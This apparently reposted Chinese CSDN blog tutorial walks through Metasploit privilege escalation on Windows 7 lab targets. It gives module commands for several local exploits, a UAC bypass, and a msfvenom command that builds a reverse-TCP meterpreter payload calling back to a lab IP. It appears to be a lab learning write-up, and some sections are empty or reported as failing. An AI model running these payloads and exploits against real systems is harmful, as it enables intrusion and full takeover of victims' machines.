msf内网提权

目录

1.利用木马文件拿到shell

 2.利用ms_2018_8120提权

 3.提高程序运行级别。

 4.基于ms16_016提权

 5.基于ms14_058提权

​6.基于ms13_053提权

 7.uac绕过

8.基于ms16_032提权


1.利用木马文件拿到shell

这里呢我们就不多说了,在上一篇文章里面我进行详细说明和演示。如果有不懂的朋友可以看上一篇的文章,上一篇文章:利用msfvenom生成木马文件反弹shell、meterpreter 简单系统命令_dreamthe的博客-CSDN博客

在利用木马文件时候,可以利用getuid看到我们拿到的权限是最低权限

扫描二维码关注公众号,回复: 15994585 查看本文章

一般我们会先使用getsystem来看看是否能够获得最高权限,可以看到报错了。所以我们需要利用其他方法。

 2.利用ms_2018_8120提权

第一步 使用exploit模块  use exploit/windows/local/ms18_8120_win32k_privesc

第二步 使用 show options 查看那些参数需要设置

第三步 这里可以看到payload 已经自动设置好了,不要设置,只需要设置session 这个是我们在利用木马文件拿到会话的编号,set session 1

第四步 运行命令 ru

可以看到成功建立会话,使用getuid 看到权限变成system 最高权限。

这里简单补充一下,当我们利用木马文件拿到会话时候,可以使用backgroud 将会话保存在后台,而且是一定要将会话保存后台,不然后期设置id时候就不行了。这样你只要不是退出msf 会话一直连接。back 是退出模块  session是查看会话,刚才我们设置的会话,就是设置会话的ID ,如何你想进入会话 session -i 3 就可以进入会话ID是3 的会话。id 是1 就是我们利用木马文件拿到的会话 ID是3的我们利用CVE_2018_8120漏洞进一步提权拿到的会话,可以看到权限的提升。

 3.提高程序运行级别

该方法实际上只是以高权限重启一个返回式shellcode,并没有绕过UAC,会触发系统UAC,受害机器有提示,提示用户是否要运行

第一步 使用exploit模块  use exploit/windows/local/ask

第二步 使用 show options 查看那些参数需要设置

第三步 这里可以看到payload 已经自动设置好了,不要设置,设置session 这个是我们在利用木马文件拿到会话的编号,set session 1

第四步 随便设置一个运行程序的名字,这里设置的名字是baidu.exe

第五步 运行 run

可以看到成功建立会话,使用getuid 看到权限变成system 最高权限

 当我们运行时候,win7靶机就会弹出一个窗口,你是否运行该程序,你输入密码,点击运行,就会建立会话,但是如果过程你没有来得及点击,过了一会点击反弹shell就会失败。所以利用这个方法,其实我觉得还是比较难,看用户是否点击允许运行程序。

拿到管理员的权限,因为点击运行的时候输入管理员的密码。

 

 4.基于ms16_016提权

上面两个案例成功都是在win7 x64当中完成的,ms16_016 在 win7x64中提权失败,所以靶机我换成了win7 x86。靶机地址在上一篇文章里面去找。连接在文章一开头这里重新生成了木马文件,因为之前那个在win7x86不能运行。步骤和上一篇文章一样,通过监听运行程序拿到会话。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.138 LPORT=4444 -f exe > /root/test.exe

第一步 使用exploit模块  use exploit/windows/local/ms16_016_webdav

第二步 使用 show options 查看那些参数需要设置

第三步 set session 7 

第四步 运行 run

 可以看到拿到了system 最高权限。

 5.基于ms14_058提权

步骤如上。 

6.基于ms13_053提权

 7.uac绕过提权

本方法主要三个模块:

exploit/windows/local/bypassuac

exploit/windows/local/bypassuac_injection

exploit/windows/local/bypassuac_vbs

这里以exploit/windows/local/bypassuac模块为例。该模块在windows 32位和64位下都有效,

本模块执行成功后将会返回一个新的会话。

msf > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > set session 1
msf exploit(bypassuac) > exploit

模块执行成功后,执行getuid发现还是普通权限,不要失望,继续执行getsystem,再次查看权限,成功绕过UAC,且已经是系统权限了。

其他两个模块用法和上面一样,原理有所不同,执行成功后都会返回一个新的meterpreter shell,且都需要执行getsystem获取系统权限。

(这个方法我的两个靶机都没有成功,不知道啥原因,后期我在看看,这个方法大家可以试试)

8.基于ms16_032提权

(这个也没有成功,我看别人有提就可大家写了一下。大家自己试试)

这些都是我自己试验的,还有一些提权方式大家自己百度咯。后期有在补充

猜你喜欢

转载自blog.csdn.net/dreamthe/article/details/121472418